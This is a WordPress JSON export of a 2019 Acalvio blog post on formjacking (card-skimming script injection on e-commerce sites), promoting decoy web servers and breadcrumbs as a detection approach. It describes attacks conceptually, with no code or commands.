{"id":6452,"date":"2019-03-26T17:22:33","date_gmt":"2019-03-27T00:22:33","guid":{"rendered":"https:\/\/www.acalvio.com\/?p=6452"},"modified":"2019-03-26T17:22:33","modified_gmt":"2019-03-27T00:22:33","slug":"formjacking-deception-is-your-cure","status":"publish","type":"post","link":"https:\/\/acalvio.p2staging.us\/index.php\/2019\/03\/26\/formjacking-deception-is-your-cure\/","title":{"rendered":"Formjacking: Deception is your cure"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">I recently saw a news article published by <\/span><a href=\"https:\/\/investor.symantec.com\/About\/Investors\/press-releases\/press-release-details\/2019\/Cyber-Criminals-Cash-in-on-Millions-With-Formjacking-Posing-a-Serious-Threat-to-Businesses-and-Consumers\/default.aspx\"><span style=\"font-weight: 400;\">Symantec<\/span><\/a><span style=\"font-weight: 400;\"> stating that cyber criminals are shifting their attack techniques. According to Symantec, b\u0000\u001cFor the first time since 2013, ransomware infections declined, dropping by 20 percent.b\u0000\u001d Due to the sharp decline in the price of cryptocurrency, attackers are increasingly interested in formjacking attacks, such as MageCart, rather than simply detonating ransomware inside corporate environments and asking for ransom to paid via bitcoin. <\/span><br \/>\n<span style=\"font-weight: 400;\">This is very interesting. As in my previous <\/span><a href=\"https:\/\/www.acalvio.com\/using-deception-to-effectively-fight-ransomware\/\"><span style=\"font-weight: 400;\">blog post<\/span><\/a><span style=\"font-weight: 400;\">, Kaspersky drew a similar conclusion. I talked about how to leverage deception to effectively detect ransomware. In this post, I will discuss how we could use deception based detection solution to fight formjacking attack. <\/span><br \/>\n<span style=\"font-weight: 400;\">Formjacking is a relatively new term in cyber security. In Symantecb\u0000\u0019s definition, b\u0000\u001cFormjacking attacks are simple b\u0000\u0013 essentially virtual ATM skimming b\u0000\u0013 where cyber criminals inject malicious code into retailersb\u0000\u0019 websites to steal shoppersb\u0000\u0019 payment card details.b\u0000\u001c B Symantec claims more than 4,800 unique websites are compromised with formjacking on a monthly basis, and almost one third of the attacks in 2018 happened during the busiest shopping reason, Nov and Dec. This is absolutely shocking! <\/span><br \/>\n<span style=\"font-weight: 400;\">The worst part about formjacking is that <\/span><b><i>neither the website administrator nor the online shoppers are aware that credentials are being stolen from the website<\/i><\/b><span style=\"font-weight: 400;\">. Unlike ransomware, which is detectable when encryption starts or the ransom note is shown, formjacking can hide itself inside the web server and secretively collect credit card information for months before anybody notices. Once website code is published, it is generally not checked again until the next update is made. In the meantime, the actual e-commerce transaction goes through as if nothing has happened without any business interruption. From the customerb\u0000\u0019s perspective, they simply continue shopping online and probably realize their credit card information has been stolen until days or weeks later. This type of delayed alerting makes it extremely difficult to track.<\/span><br \/>\n<span style=\"font-weight: 400;\">In my opinion, formjacking is an even more powerful and dangerous attack than ransomware for following reasons. <\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Itb\u0000\u0019s extremely hard to detect and has much longer dwell time in corporate environments. <\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Itb\u0000\u0019s becoming increasingly popular and attractive to hackers because of the high yield. (According to the article, with a single credit card fetching up to $45 in the underground selling forums, attackers get get up to $2.2M each month)<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">It can deeply hurt both the business reputation of the ecommerce website and the customerb\u0000\u0019s personal identity. <\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">This really puts ecommerce websites and online retailers under pressure. The most recent famous victims include Ticketmaster and British Airways. Over 380,000 credit cards were stolen in the British Airways incident alone, according to Symantec. <\/span><br \/>\n<span style=\"font-weight: 400;\">If we take a step back and think about the typical attacker workflow, we can see how a Deception based solution could be a perfect tool to fight back. Let me explain how. We all know most of the corporate breaches start from user endpoint, their laptop and workstation, which are the most vulnerable components in corporate security. Once an attacker compromises an endpoint and establishes their beachhead, they will start looking for high value targets inside the victim network. In the Formjacking scenario, the target is the web servers in the data center. From a compromised endpoint, they will try to move laterally into the web farm, where they can inject the malicious code. Once they achieve that, itb\u0000\u0019s mission accomplished. <\/span><br \/>\n<span style=\"font-weight: 400;\">Enterprise customers could deploy deception based detection solution in the following places to catch and detect the attacker activity. <\/span><br \/>\n<span style=\"font-weight: 400;\">First, enterprises B could also set up a number of fake web servers (called decoys) throughout the entire web farm. An ecommerce website typically consists of multiple web servers, sometimes even hundreds or thousands. B Even if the attackers safely land on the web server without being detected, it is in their best interest to deploy their malicious code into as many web servers as possible. It is, therefore, very likely they will eventually try to do so on one of the fake systems as they navigate through the web farm, which will trigger an alert immediately. <\/span><br \/>\n<span style=\"font-weight: 400;\">Second, enterprises could generate breadcrumbs, fake artifacts meant to lead adversaries to decoys, and distribute them across endpoints in the environment. Breadcrumbs can be of various types, including SMB file shares, saved RDP\/SSH sessions and credentials, etc. These are the typical clues attackers look for in their search for high value targets; in this case, the web servers. In case any of the endpoints get compromised, those breadcrumbs could serve as bait leading attackers to one of the intentionally placed decoys (instead of real web server). Once an attacker connects to the decoy, the deception solution immediately identifies them and various types of responses can be initiated.<\/span><br \/>\n<span style=\"font-weight: 400;\">Using deception is probably the most effective way to combat formjacking attacks. It is completely out-of-band, no interruption to regular production traffic, and provides very fast and accurate detection. It can significantly reduce the attacker dwell time and help e-commerce websites provide secure and safe transactions to its customer. Acalvio ShadowPlelx is a leading deception platform which can help you easily setup web decoys and breadcrumbs in your environment, as described above, whether you are hosting this on-prem or in the cloud. If you are concerned about formjacking attacks, please contact us for more information! <\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Formjacking attacks embed JavaScript into ecommerce sites to siphon off credit card data.<\/p>\n","protected":false},"author":2,"featured_media":6453,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[87,97,118],"_links":{"self":[{"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/posts\/6452"}],"collection":[{"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/comments?post=6452"}],"version-history":[{"count":0,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/posts\/6452\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/media\/6453"}],"wp:attachment":[{"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/media?parent=6452"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/categories?post=6452"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/acalvio.p2staging.us\/index.php\/wp-json\/wp\/v2\/tags?post=6452"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}